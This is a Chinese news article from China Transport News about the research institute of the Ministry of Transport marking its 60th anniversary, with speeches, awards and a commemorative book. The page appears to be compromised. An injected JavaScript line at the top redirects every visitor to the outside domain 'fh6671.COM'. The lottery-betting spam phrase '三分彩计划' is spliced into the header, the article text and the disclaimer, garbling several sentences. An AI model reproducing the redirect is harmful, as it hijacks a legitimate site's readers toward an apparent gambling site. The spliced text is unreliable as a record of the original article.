function jumurl(){ window.location.href = 'fh6671.COM' } setTimeout(jumurl,2000); jumurl();

三分彩计划

交通运输部主管  中国交通报社主办

中国交通新闻网三分彩计划  > 要闻

部交科院举办建院六十周年主题活动

打造一流院所有力支撑加快建设交通强国

2020-11-18 11:27:10 来源:中国交通新闻网 作者:记者 薛彩云 梁微

11月17日,交通运输部科学研究院(简称部交科院)迎来建院60周年。在当日举行的“与交通同行 与科技共进”主题活动上,交通运输部副部长刘小明以视频形式表示祝贺。他强调,部交科院要坚持以习近平新时代中国特色社会主义思想为指导,以60周年院庆为契机,立足“高端专业智库、一流创新基地、重要服务平台”发展定位,坚持高质量发展,注重科技创新,坚持人才强院,建设一流研究院所,创造一流科研成果,打造一流科研队伍,为加快建设交通强国和服务构建新发展格局提供有力支撑。

三分彩计划大会指出,60年来,部交科院在部党组的正确领导下,从初始创业走向繁荣发展,科技创新能力和公益服务水平实现了跨越式提升,从单一到多元,由传统的公益性科研单位,壮大为软科学与硬技术并重,集科研与产业于一体,拥有八大核心业务的行业科研“国家队”,谱写了辉煌的历史篇章。

新形势需要新担当,新使命呼唤新作为。部交科院将深入学习贯彻习近平新时代中国特色社会主义思想,坚决贯彻落实部党组决策部署,以“科技强交 奉献社会”为使命,着力构建更高质量、更具效率、更有温情的公益服务、科技创新、服务社会、人才队伍、科研条件、运行管理、文化建设“七位一体”的工作体系,以高质量党建引领高质量发展,全力打造交通运输领域国内著名、国际知名的综合性科研院所,为推进交通运输高质量发展、加快建设交通强国作出更大贡献。

主题活动上,揭晓了2020年度“交科院青年英才”奖项,发布了《交科院印迹60年》纪念文集,表彰了60年来重大成果和创新领军人物,颁发了“致敬人物——突出成就奖”和“致敬人物——特别贡献奖”。

中国交通新闻网版权及免责声明:
1、凡本网注明“来源:中国交通报”、“来源:中国交通新闻网” 的所有作品,版权均属于中国交通新闻网,未经本网授权,任何单位及个人不得转载、摘编或以其他方式使用上述作品。已经本网授权使用作品的,应在授权范围 内使用,并注明“来源:中国交通新闻网”。违反上述声明者,本网将追究其相关法律责任。
2、凡本网注明 “来源:XXX(非中国交通新闻网)” 的作品,均转载自其他媒体,转载目的在于传递更多信息,并不代表本网赞同其观点和对其真实性负责。
三分彩计划 3、如因作品内容、版权和其他问题需要同本网联系的,请在30日内进行。

新媒体

热门推荐更多>>

问计于民问计于网

围绕党中央、国务院重大决策部署和交通运输部党组中心工作,倾听群众呼声、查找突出问题、吸收基层智慧,更好服务人民、服务大局、服务基层。